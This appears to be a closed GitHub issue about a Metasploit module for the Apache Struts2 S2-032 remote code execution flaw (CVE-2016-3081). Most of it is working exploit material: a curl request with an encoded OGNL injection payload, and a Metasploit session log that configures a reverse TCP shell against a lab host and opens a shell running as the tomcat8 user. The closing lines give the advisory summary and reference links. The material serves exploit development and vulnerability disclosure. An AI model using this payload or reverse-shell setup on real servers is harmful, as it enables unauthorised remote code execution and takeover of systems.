Closed nixawk closed 8 years ago
curl -v http://demo.com/index.action?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C%23test%3D%23context.get%28%23parameters.res%5B0%5D%29.getWriter%28%29%2C%23test.println%28%23parameters.command%5B0%5D%29%2C%23test.flush%28%29%2C%23test.close&res=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=%23%23%23Struts2-S2-032-Vulnerable%23%23%23
I will try to clear the code, and give a new pr.
msf exploit(struts_code_exec_dynamic_method_invocation) > show options
Module options (exploit/multi/http/struts_code_exec_dynamic_method_invocation):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_SLEEPTIME 5 yes The time, in seconds, to ask the server to sleep while check
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.1.105 yes The target address
RPORT 8080 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /struts2-blank/example/HelloWorld.action yes The path to a struts application action
VHOST no HTTP server virtual host
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST 192.168.1.101 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Universal
msf exploit(struts_code_exec_dynamic_method_invocation) > run
[*] Started reverse TCP handler on 192.168.1.101:4444
200
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.105:39154) at 2016-04-28 21:48:34 +0800
id
uid=118(tomcat8) gid=125(tomcat8) groups=125(tomcat8)
Added in #6831
CVE-2016-3081 - Struts2 s2-032 — Remote Code Execution can be performed via method: prefix when Dynamic Method Invocation is enabled.
https://struts.apache.org/docs/s2-032.html https://www.seebug.org/vuldb/ssvid-91389